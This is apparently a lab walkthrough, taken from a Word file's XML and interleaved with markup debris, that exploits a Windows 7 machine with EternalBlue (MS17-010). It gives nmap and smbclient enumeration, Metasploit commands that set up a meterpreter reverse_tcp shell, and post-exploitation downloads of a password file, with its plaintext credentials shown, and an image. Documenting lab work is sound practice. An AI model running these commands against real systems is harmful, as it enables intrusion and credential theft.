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My first goal is to enumerate the box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So we start with a Nmap scan of the IP address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IP: 192.168.1.162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Syntx used : nmap -T4 -p- -A 192.168.x.xxx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We saw these ports open and now we can start to look into certain ports and see if they are exploitable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From AI we can see that maybe one of our first steps would be to look into the SMB since this is rated critcal</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  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Check for SMB vulnerabilities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Port 445 and 139 suggest SMB is active.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Since the OS is Windows 7 SP1, it's likely vulnerable to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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EternalBlue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010) – critical RCE vuln.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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Null sessions / anonymous shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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Weak or no authentication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We did happen to find a vulnerability with a Nmap scan script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 Check for SMB vulnerabilities (including EternalBlue)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nmap --script smb-vuln* -p 445 192.168.1.162</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">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scan confirms the target is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable to MS17-010 (EternalBlue)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a high-impact Remote Code Execution vulnerability.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✅ nmap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This is the base command for running the Nmap network scanner.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✅ --script smb-vuln*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This tells Nmap to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that start with smb-vuln. These are NSE (Nmap Scripting Engine) scripts designed to check for vulnerabilities in the SMB service.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Specifically includes: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smb-vuln-ms17-010.nse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smb-vuln-ms10-054.nse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smb-vuln-ms10-061.nse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...and others if available.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✅ -p 445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This limits the scan to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP port 445</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the SMB port.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✅ 192.168.1.162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target IP address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> you're scanning.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br w:type="textWrapping"/>
        <w:t xml:space="preserve"> We looked in the smb client because it said it was open to guest and this what we found</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> 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smbclient -L \\\\192.168.1.162\\ -N</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> This asked for a list of shared SMB resources on the host at 192.168.1.162, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without using any credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-N for no password).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> 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br w:type="textWrapping"/>
        <w:t xml:space="preserve">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Even though IPC$ doesn’t give files, its accessibility </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is still useful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Null sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to: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Enumerate users, groups, and shares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Mount attacks that exploit weak SMB configurations</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">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We got into the IPC but it didn’t have any files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🛠️ Exploitation Walkthrough Notes — MS17-010 + SMB Enumeration</w:t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🧭 Reconnaissance</w:t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🔍 Step 1: Nmap Scan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nmap -T4 -p- -A 192.168.1.162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Found SMB ports 135, 139, 445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OS: Windows 7 Ultimate SP1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Guest access enabled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RPC ports open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🔍 Step 2: Check SMB Vulnerabilities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nmap --script smb-vuln* -p 445 192.168.1.162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Confirmed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EternalBlue) vulnerability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🧰 SMB Enumeration</w:t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🗂️ Step 3: List Shares (anonymous)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smbclient -L \\\\192.168.1.162\\ -N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Found: ADMIN$, C$, IPC$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Could not list workgroup (normal)</w:t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📂 Step 4: Try IPC$ null session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smbclient \\\\192.168.1.162\\IPC$ -N</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ls  # failed because IPC$ is not a file share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💥 Exploitation with Metasploit</w:t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🔍 Step 5: Search for EternalBlue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msfconsole</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> search ms17_010</w:t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💻 Step 6: Use the Exploit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use exploit/windows/smb/ms17_010_eternalblue</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> set RHOSTS 192.168.1.162</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> set LHOST &lt;your_Kali_IP&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> run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Got a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter shell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📦 Post-Exploitation</w:t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🔍 Step 7: Search for password file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search -f pw.txt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Found: c:\Users\Administrator\Desktop\PW.txt</w:t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💾 Step 8: Download it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lcd /home/kali/Desktop/loot</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> download "c:\\Users\\Administrator\\Desktop\\PW.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="540" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:ind w:left="5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ind w:left="540" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSUsername: Noelle </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> PW: 1232456!</w:t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🖼️ Step 9: Download a picture file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cd "C:\\Users\\Administrator\\Pictures"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ls</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> download "C:\\Users\\Administrator\\Pictures\\&lt;filename&gt;.png"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✅ Final Result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Gained </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via EternalBlue (MS17-010)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Extracted plaintext credentials from desktop file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Exfiltrated image drawn in Paint from Pictures folder</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Manual way</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> we found ms17 on git hub and git cloned it into the documents folder</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  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5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Have to be careful this can tip over a server</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  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5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5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Sometimes these exploits will bust the computer!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b w:val="1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 w:val="1"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22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4.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId21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7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6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